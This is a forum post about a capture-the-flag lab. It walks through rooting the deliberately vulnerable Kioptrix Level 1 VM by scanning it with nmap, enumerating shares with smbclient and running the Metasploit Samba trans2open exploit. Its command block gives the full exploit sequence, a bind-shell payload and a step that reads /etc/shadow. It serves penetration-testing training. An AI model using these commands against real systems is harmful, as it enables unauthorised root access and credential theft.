Results 1 to 1 of 1

Thread: [Video] Kioptrix - Level 1 (Samba)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Kioptrix - Level 1 (Samba)

    Links
    Watch video on-line: http://blip.tv/file/4924035
    Download video: http://www.mediafire.com/?7rsj1agn28aounc


    Brief Overview
    Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible. This is the second video on it, first one here. Unlike last time, the entry method was via a samba weakness method which is a quick attack and straight to root.


    Method
    * Scan network for hosts (nmap)
    * Scan target for running services (nmap)
    * Detect network shares (smbclient)
    * Exploit samba weakness, Trans2open (Metasploit)
    * Game Over


    What do I need?
    * Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5:4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD58DB6CE65652880327B92150B08106EA)
    * VMware player OR workstation. Download here
    * nmap – (Can be found on BackTrack 4-R2). Download here
    * smbclient – (Can be found on BackTrack 4-R2). Download here
    * metasploit – (Can be found on BackTrack 4-R2). Download here



    Walkthrough
    A quick general nmap scan shows what hosts are on the network currently, before doing a more detailed scan on the target (192.168.0.111). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this are:
    * OS: Linux v2.4.x (2.4.9-18)
    * Samba: Samba smbd (wordgroup: MYGROUP)


    The next stage was to test to make sure that samba was functioning correctly. By using smbclient, the attacker lists all services which are available on a target. The result being:
    * Anonymous login
    * Hostname (KIOPTRIX)
    * Workgroup (MYGROUP)
    * Defautl hidden admin shares (IPC$, ADMIN$)

    The attacker proceeds begins by starting up metasploit and searching for a known exploit. After configuring all the settings required, the attacker launches it. Very soon afterwards the attacker has a remote shell, with "root" access to the system.


    Commands
    Code:
    start-network
    dhclient eth0
    clear
    
    nmap 192.168.0.* -n -sn -sP
    nmap 192.168.0.111 -T4 -O -sV -sS   #-sC -A -p- -v
    
    #nmblookup -A 192.168.0.111       # Hostname
    smbclient -L \\192.168.0.111 -N   # What services are available on a server
    clear
    
    msfconsole
    search samba
    use linux/samba/trans2open
    #info
    show options
    set RHOST 192.168.0.111
    show options
    exploit
    #msfcli linux/samba/trans2open RHOST=192.168.0.111 PAYLOAD=generic/shell_bind_tcp E    #PAYLOAD=linux/x86/shell_bind_tcp
    
    id
    uname -a
    cat /etc/shadow
    cat /etc/issue
    Notes
    Song: Gershon Kingsley - Pop Corn
    Video length: 02:18
    Capture length: 03:11
    Blog Post: http://g0tmi1k.blogspot.com/2011/03/...l-1-samba.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38997-%5Bvideo%5D-kioptrix-level-1-samba.html#post192416
    Last edited by g0tmi1k; 03-27-2011 at 07:58 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Kioptrix - Level 1 (mod_ssl)
    By g0tmi1k in forum BackTrack Videos
    Replies: 2
    Last Post: 03-06-2011, 11:49 PM
  2. [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  3. [Video] Kioptrix - Level 2 (Injection)
    By g0tmi1k in forum BackTrack Videos
    Replies: 1
    Last Post: 03-05-2011, 11:47 AM
  4. [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  5. [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •